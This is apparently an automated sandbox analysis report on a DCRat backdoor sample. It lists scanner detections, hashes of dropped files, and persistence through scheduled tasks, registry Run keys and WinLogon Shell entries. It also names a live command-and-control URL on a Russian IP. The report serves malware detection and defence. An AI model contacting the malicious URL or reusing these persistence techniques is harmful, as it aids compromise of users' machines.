                      Source | Detection | Scanner | Label
                      84JufgBTrA.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                      84JufgBTrA.exe | 100% | Avira | TR/Dropper.Gen
                      84JufgBTrA.exe | 100% | Joe Sandbox ML |
                      Source | Detection | Scanner | Label
                      C:\Users\user\Desktop\DvHnLgjG.log | 100% | Avira | TR/PSW.Agent.qngqt
                      C:\Recovery\RuntimeBroker.exe | 100% | Avira | TR/Dropper.Gen
                      C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe | 100% | Avira | TR/Dropper.Gen
                      C:\Users\user\Desktop\DNOFZBcI.log | 100% | Avira | HEUR/AGEN.1362695
                      C:\Users\user\AppData\Local\Temp\OO0he60sKA.bat | 100% | Avira | BAT/Delbat.C
                      C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe | 100% | Avira | TR/Dropper.Gen
                      C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe | 100% | Avira | TR/Dropper.Gen
                      C:\Users\user\Desktop\DvHnLgjG.log | 100% | Joe Sandbox ML |
                      C:\Recovery\RuntimeBroker.exe | 100% | Joe Sandbox ML |
                      C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe | 100% | Joe Sandbox ML |
                      C:\Users\user\Desktop\DNOFZBcI.log | 100% | Joe Sandbox ML |
                      C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe | 100% | Joe Sandbox ML |
                      C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe | 100% | Joe Sandbox ML |
                      C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                      C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                      C:\Recovery\RuntimeBroker.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                      C:\Users\user\Desktop\BKcXESYN.log | 8% | ReversingLabs |
                      C:\Users\user\Desktop\BgcwUNOc.log | 8% | ReversingLabs |
                      C:\Users\user\Desktop\BxjPijIe.log | 8% | ReversingLabs |
                      C:\Users\user\Desktop\DNOFZBcI.log | 8% | ReversingLabs |
                      C:\Users\user\Desktop\DvHnLgjG.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                      C:\Users\user\Desktop\FGdoLyOG.log | 29% | ReversingLabs |
                      C:\Users\user\Desktop\FPAovlhD.log | 17% | ReversingLabs |
                      C:\Users\user\Desktop\FoaFqfIX.log | 5% | ReversingLabs |
                      C:\Users\user\Desktop\GbeNbtEV.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                      C:\Users\user\Desktop\IIQWghSC.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\IeQwxcIQ.log | 21% | ReversingLabs |
                      C:\Users\user\Desktop\LgDeSLNM.log | 8% | ReversingLabs |
                      C:\Users\user\Desktop\LqWvJvsp.log | 6% | ReversingLabs |
                      C:\Users\user\Desktop\LyGNneTv.log | 9% | ReversingLabs |
                      C:\Users\user\Desktop\MUHnEZJK.log | 9% | ReversingLabs |
                      C:\Users\user\Desktop\PTVdvIcA.log | 12% | ReversingLabs |
                      C:\Users\user\Desktop\QKxdLVJD.log | 29% | ReversingLabs |
                      C:\Users\user\Desktop\RHZlgVYy.log | 4% | ReversingLabs |
                      C:\Users\user\Desktop\RjzUmbxe.log | 12% | ReversingLabs |
                      C:\Users\user\Desktop\SWHMRrhv.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate
                      C:\Users\user\Desktop\UPWuCoSt.log | 6% | ReversingLabs |
                      C:\Users\user\Desktop\VMyCYnho.log | 21% | ReversingLabs |
                      C:\Users\user\Desktop\VZqLtXxX.log | 17% | ReversingLabs |
                      C:\Users\user\Desktop\WDaDoBOr.log | 8% | ReversingLabs |
                      C:\Users\user\Desktop\XACLJBdm.log | 17% | ReversingLabs |
                      C:\Users\user\Desktop\XbctOGCS.log | 21% | ReversingLabs |
                      C:\Users\user\Desktop\YKVbAlIQ.log | 21% | ReversingLabs |
                      C:\Users\user\Desktop\aVrcADnQ.log | 4% | ReversingLabs |
                      C:\Users\user\Desktop\bAMSHhIJ.log | 8% | ReversingLabs |
                      C:\Users\user\Desktop\crpSXvpM.log | 12% | ReversingLabs |
                      C:\Users\user\Desktop\cvDcQhTg.log | 3% | ReversingLabs |
                      C:\Users\user\Desktop\dLiSHAoK.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                      C:\Users\user\Desktop\eqGsIhxV.log | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\fmuTYeTZ.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                      C:\Users\user\Desktop\hKwJyjHA.log | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\iyARkwDy.log | 3% | ReversingLabs |
                      C:\Users\user\Desktop\jdYrkeMJ.log | 17% | ReversingLabs |
                      C:\Users\user\Desktop\kZMRAajN.log | 17% | ReversingLabs | Win32.Trojan.Generic
                      C:\Users\user\Desktop\kvbZFwSt.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\lWnZWaxI.log | 17% | ReversingLabs |
                      C:\Users\user\Desktop\nuBirctr.log | 12% | ReversingLabs |
                      C:\Users\user\Desktop\ordqNcIm.log | 5% | ReversingLabs |
                      C:\Users\user\Desktop\pMdQdXyB.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\qJFYyXNw.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\rcIHUqTf.log | 17% | ReversingLabs | Win32.Trojan.Generic
                      C:\Users\user\Desktop\tevppZXa.log | 8% | ReversingLabs |
                      C:\Users\user\Desktop\wtLyrQzn.log | 12% | ReversingLabs |
                      C:\Users\user\Desktop\xlsyLrRW.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate
                      C:\Users\user\Desktop\yMEybVxl.log | 13% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\yZwGwFNU.log | 17% | ReversingLabs |
                      C:\Users\user\Desktop\zXYOSFcP.log | 13% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\zmagdNkm.log | 12% | ReversingLabs |
                      No Antivirus matches
                      No Antivirus matches
                      Source | Detection | Scanner | Label
                      https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
                      http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
                      https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
                      http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
                      http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
                      https://contoso.com/License | 0% | URL Reputation | safe
                      https://contoso.com/Icon | 0% | URL Reputation | safe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
                      https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
                      https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
                      https://contoso.com/ | 0% | URL Reputation | safe
                      https://nuget.org/nuget.exe | 0% | URL Reputation | safe
                      https://aka.ms/pscore68 | 0% | URL Reputation | safe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
                      http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
                      https://g.live.com/odclientsettings/ProdV2.C: | 0% | Avira URL Cloud | safe
                      https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
                      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | 0% | Avira URL Cloud | safe
                      https://g.live.com/odclientsettings/ProdV2 | 0% | Avira URL Cloud | safe
                      http://schemas.xmlsoap.org/wsdl/ | 0% | Avira URL Cloud | safe
                      https://g.live.com/odclientsettings/Prod.C: | 0% | Avira URL Cloud | safe
                      http://31.177.108.211/lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php | 100% | Avira URL Cloud | malware
                      No contacted domains info
                      Name | Malicious | Antivirus Detection | Reputation
                      http://31.177.108.211/lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php | true | Avira URL Cloud: malware | unknown
                      IP | Domain | Country | ASN | ASN Name | Malicious
                      31.177.108.211 | unknown | Russian Federation | 44053 | UNILINK-ASRU | true
                      IP
                      127.0.0.1
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1511007
                      Start date and time:2024-09-13 21:01:06 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 11m 46s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of new started processes analysed:54
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:84JufgBTrA.exe
                      renamed because original name is a hash value
                      Original Sample Name:3c9cf0b38226e2a7f0191a0130536859.exe
                      Detection:MAL
                      Classification:mal100.spre.troj.spyw.expl.evad.winEXE@44/334@0/2
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 184.28.90.27
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target MaEiPrsQRasQLtRzJjb.exe, PID 7328 because it is empty
                      • Execution Graph export aborted for target MaEiPrsQRasQLtRzJjb.exe, PID 7660 because it is empty
                      • Execution Graph export aborted for target RuntimeBroker.exe, PID 7112 because it is empty
                      • Not all processes were analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtCreateFile calls found.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: 84JufgBTrA.exe
                      Time | Type | Description
                      15:02:10 | API Interceptor | 153x Sleep call for process: powershell.exe modified
                      15:02:22 | API Interceptor | 1884509x Sleep call for process: MaEiPrsQRasQLtRzJjb.exe modified
                      15:02:25 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                      20:02:07 | Task Scheduler | Run new task: MaEiPrsQRasQLtRzJjb path: "C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe"
                      20:02:07 | Task Scheduler | Run new task: MaEiPrsQRasQLtRzJjbM path: "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                      20:02:07 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Recovery\RuntimeBroker.exe"
                      20:02:07 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\Recovery\RuntimeBroker.exe"
                      20:02:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjb "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                      20:02:20 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
                      20:02:32 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjb "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                      20:02:44 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
                      20:02:54 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjb "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                      20:03:03 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
                      20:03:20 | Autostart | Run: WinLogon Shell "C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe"
                      20:03:28 | Autostart | Run: WinLogon Shell "C:\Recovery\RuntimeBroker.exe"
                      20:03:36 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\windowspowershell\Configuration\MaEiPrsQRasQLtRzJjb.exe"
                      20:03:45 | Autostart | Run: WinLogon Shell "C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe"
                      20:03:53 | Autostart | Run: WinLogon Shell "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                      No context
                      No context
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      UNILINK-ASRU | Galaxy Swapper v2.0.3.exe | malicious | RedLine | 31.177.108.53
                      UNILINK-ASRU | Build.exe | malicious | Luca Stealer, Quasar | 31.177.108.29
                      UNILINK-ASRU | KR6nDu9fLhop1bFe.exe | malicious | Quasar | 31.177.108.29
                      UNILINK-ASRU | k5kWDiia0s.elf | malicious | Mirai, Gafgyt | 95.174.91.180
                      UNILINK-ASRU | hVRAoMLVTN.elf | malicious | Gafgyt, Mirai | 95.174.91.180
                      UNILINK-ASRU | xFg36ZRw8k.elf | malicious | Gafgyt, Mirai | 95.174.91.180
                      UNILINK-ASRU | D2QzGNEZhk.elf | malicious | Gafgyt, Mirai | 95.174.91.180
                      UNILINK-ASRU | T8gCMqaA72.elf | malicious | Gafgyt, Mirai | 95.174.91.180
                      UNILINK-ASRU | rAzw6F2np2.elf | malicious | Gafgyt, Mirai | 95.174.91.180
                      UNILINK-ASRU | 2kik39qqSw.elf | malicious | Gafgyt, Mirai | 95.174.91.180
                      Match | Associated Sample Name / URL | Detection | Threat Name
                      C:\Users\user\Desktop\BKcXESYN.log | eRZQCpMb4y.exe | malicious | DCRat, PureLog Stealer, zgRAT
                        | PCCooker2.0_x64.exe | malicious | AsyncRAT, DCRat, GuLoader, Lokibot, Njrat, PureLog Stealer, SilverRat
                        | kIdT4m0aa4.exe | malicious | DCRat, PureLog Stealer, zgRAT
                        | 5R28W1PAnS.exe | malicious | DCRat, PureLog Stealer, zgRAT
                        | iqA8j9yGcd.exe | malicious | HackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT
                        | TwfUz3FuO7.exe | malicious | DCRat, PureLog Stealer, zgRAT
                        | z3yAH0LL5e.exe | malicious | DCRat, PureLog Stealer, zgRAT
                        | Componentsession.exe | malicious | DCRat, PureLog Stealer, zgRAT
                        | -#U00bc).exe | malicious | DCRat, PureLog Stealer, zgRAT
                        | Loader.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with very long lines (444), with no line terminators
                                          Category:dropped
                                          Size (bytes):444
                                          Entropy (8bit):5.821018383420598
                                          Encrypted:false
                                          SSDEEP:12:6AOn0mez+OJFodQl9ykfcA1VIA0GWHWPsbRmcUM8HGFuK/:6n0t+cFXzsHWUbIM8Ip/
                                          MD5:2F9BD855D163FBA784B0C5858388B060
                                          SHA1:E50B34B5246433404F8A4506AE1859E98ADD74E1
                                          SHA-256:7D589D7FF8789813823FC5E7F0F8E8565BE153BE9EEE977B7AEF01E06C3E65A7
                                          SHA-512:633C7D28C7B3043B685C44E58532D5A76F0EEB964479CEDD4C64263D3C469FCD354A3FA00887AACCEF73A14C3F9715DAD2A6821D1FB1CA318B6F03688E0099C5
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                          Category:dropped
                                          Size (bytes):3511394
                                          Entropy (8bit):7.993950820060533
                                          Encrypted:true
                                          SSDEEP:49152:uGmcpg5vS+c8OorsMzNRK6v1hFXefh0iMB+0b+N/uyVbVihyXYuIS:t0vfxoEe6vHFXgh5cb+NhqlS
                                          MD5:3C9CF0B38226E2A7F0191A0130536859
                                          SHA1:87D531257A15E18B50FA341BCE9AC3C5A71BA80D
                                          SHA-256:4AC2DDB4FA2D1917AE491B5AC623E7EBF23E5E34667C63E5ACD433CC6696C23D
                                          SHA-512:AD6BC0C26B6ADBB7EAD5DB17FB4FD4285BCFD623531F41AD6AE31E97A1E760A59F36DE05EAB0E298E0892FEA03D4A4C2AE389D90036C784EDB44E61D7A8161D2
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 68%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with very long lines (457), with no line terminators
                                          Category:dropped
                                          Size (bytes):457
                                          Entropy (8bit):5.840142183311164
                                          Encrypted:false
                                          SSDEEP:6:O6jJl2Q2tEmIjtuuXPGhHkNpRL9HYUU5KOBKbBGo2blGbkTrCPFXkTlTpTP6tnbg:PjJDJmIwbczLJUiIQbkCtXaJxPGZpPAh
                                          MD5:51F18D5D2A7D5798E733808187B7E3AB
                                          SHA1:DA191CF5F5E01A653727B6073602C18D2D76A2C9
                                          SHA-256:152621A4C2E12F228934FAFC6C8AE97555ADB2499C2D83F428CC7AC1A70F4F75
                                          SHA-512:F87F81FF0CD138627F1AE4FE60624B8AFF60B815F56C9C0E1953F8227046141AA16F9E8B3E67E6B320C43C64DBFCA99BB7ADD71009CB955420F9C6656DF7BD89
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                          Category:dropped
                                          Size (bytes):3511394
                                          Entropy (8bit):7.993950820060533
                                          Encrypted:true
                                          SSDEEP:49152:uGmcpg5vS+c8OorsMzNRK6v1hFXefh0iMB+0b+N/uyVbVihyXYuIS:t0vfxoEe6vHFXgh5cb+NhqlS
                                          MD5:3C9CF0B38226E2A7F0191A0130536859
                                          SHA1:87D531257A15E18B50FA341BCE9AC3C5A71BA80D
                                          SHA-256:4AC2DDB4FA2D1917AE491B5AC623E7EBF23E5E34667C63E5ACD433CC6696C23D
                                          SHA-512:AD6BC0C26B6ADBB7EAD5DB17FB4FD4285BCFD623531F41AD6AE31E97A1E760A59F36DE05EAB0E298E0892FEA03D4A4C2AE389D90036C784EDB44E61D7A8161D2
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 68%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:false
                                          Preview:[ZoneTransfer]....ZoneId=0
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe7db24f5, page size 16384, DirtyShutdown, Windows version 10.0
                                          Category:dropped
                                          Size (bytes):1310720
                                          Entropy (8bit):0.4221682173686186
                                          Encrypted:false
                                          SSDEEP:1536:BSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Baza/vMUM2Uvz7DO
                                          MD5:F61D2B434652E5093CDB51BC9184DB51
                                          SHA1:3604EDC7C980165E983F04DE793E7B3A5970C3F4
                                          SHA-256:CCA283C3720D495A48D208B412D2154ED9BAD75DC2F91927AED24F63BF9BA159
                                          SHA-512:D5AB37DA4C71E257EF61AD6BC1A10FA5E1F0E5C03B90273E6955DA5310946BB73299063B3CF00AB648EC643B0E81AE111778DD0B99A2C8F2546DBFDC8345F032
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with very long lines (458), with no line terminators
                                          Category:dropped
                                          Size (bytes):458
                                          Entropy (8bit):5.827946673543157
                                          Encrypted:false
                                          SSDEEP:12:NA11T5byCuCho6EFZacMwrYsOIt0cC3y8c0SL8J6Ur4Jgej:45yCRPsafid2e88U02ej
                                          MD5:EDD6571F68D200AD1E4EB7B4E96CA36B
                                          SHA1:B8FB92E163AC97DBC860B1C8BB14EB3EBA398F04
                                          SHA-256:E3DC7422E012FC76E6AF0A93055144F8B3E0CE036F86497B6475A9E59B1D3087
                                          SHA-512:E13D9992E24AE2D8DF386D051593F450EF7BE1593FB04D83330A1FF0BDCDAF92FC4FF60ADCAE23A53D708DAB27F78B313664A359FFCAB8BAC4016407D5C401AF
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                          Category:dropped
                                          Size (bytes):3511394
                                          Entropy (8bit):7.993950820060533
                                          Encrypted:true
                                          SSDEEP:49152:uGmcpg5vS+c8OorsMzNRK6v1hFXefh0iMB+0b+N/uyVbVihyXYuIS:t0vfxoEe6vHFXgh5cb+NhqlS
                                          MD5:3C9CF0B38226E2A7F0191A0130536859
                                          SHA1:87D531257A15E18B50FA341BCE9AC3C5A71BA80D
                                          SHA-256:4AC2DDB4FA2D1917AE491B5AC623E7EBF23E5E34667C63E5ACD433CC6696C23D
                                          SHA-512:AD6BC0C26B6ADBB7EAD5DB17FB4FD4285BCFD623531F41AD6AE31E97A1E760A59F36DE05EAB0E298E0892FEA03D4A4C2AE389D90036C784EDB44E61D7A8161D2
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 68%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1915
                                          Entropy (8bit):5.363869398054153
                                          Encrypted:false
                                          SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHmHKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKkt1GqZ4vb
                                          MD5:B3D8CC65029ED629D3371F6862D653E0
                                          SHA1:9D3D093780ABCE0D0DC0CDCE5EBE8E77BCEDC621
                                          SHA-256:83F3CDA23DB0E9B53FDDA654446707DDE6F92D4566938AE499471C701F88C245
                                          SHA-512:3ED07C087E69A317D904D2E73E024B561AF2B92F273B30CB9B748D3B4D20B502CC32322EDA60F46A4AAE5A030FBBE3C39F73A06BC5415DC26BFCF59273CFC7BF
                                          Malicious:true
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                          Process:C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:CSV text
                                          Category:dropped
                                          Size (bytes):1281
                                          Entropy (8bit):5.370111951859942
                                          Encrypted:false
                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                          MD5:12C61586CD59AA6F2A21DF30501F71BD
                                          SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                          SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                          SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                          Malicious:false
